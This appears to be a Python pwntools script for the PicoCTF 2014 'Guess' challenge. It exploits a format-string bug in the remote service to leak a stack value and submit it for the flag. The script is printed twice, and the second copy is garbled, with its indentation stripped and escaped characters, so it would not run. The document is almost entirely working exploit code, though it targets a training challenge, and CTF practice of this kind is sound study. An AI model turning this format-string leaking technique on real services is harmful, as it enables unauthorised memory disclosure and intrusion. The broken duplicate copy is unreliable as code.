0xPwny/picoctf-guess.py

## picoctf-guess.py
#!/usr/bin/python

#Guess | format string | leaking
#Abdeljalil Nouiri "crypth0n"
#PicoCTF GUESS

from pwn import *
import time
import re


for i in range(1,9):
	con = remote("vuln2014.picoctf.com",4546)
	print con.recv()
	time.sleep(1)
	con.send("%"+str(i)+"$d"+'\n')
	time.sleep(1)
	output = con.recv()
	check = output.find("game")+6
	ouin =  output[check:42]

	prep = ouin.split('\n')
	print "[+] ADDR : ",prep[0]
	con.send(prep[0]+"\n")
	out2 = con.recv()
	if "flag" in out2:
		print out2
		break
	else:
		pass
	#!/usr/bin/python

	#Guess \| format string \| leaking
	#Abdeljalil Nouiri "crypth0n"
	#PicoCTF GUESS

	from pwn import *
	import time
	import re


	for i in range(1,9):
	con = remote("vuln2014.picoctf.com",4546)
	print con.recv()
	time.sleep(1)
	con.send("%"+str(i)+"$d"+'\n')
	time.sleep(1)
	output = con.recv()
	check = output.find("game")+6
	ouin = output[check:42]

	prep = ouin.split('\n')
	print "[+] ADDR : ",prep[0]
	con.send(prep[0]+"\n")
	out2 = con.recv()
	if "flag" in out2:
	print out2
	break
	else:
	pass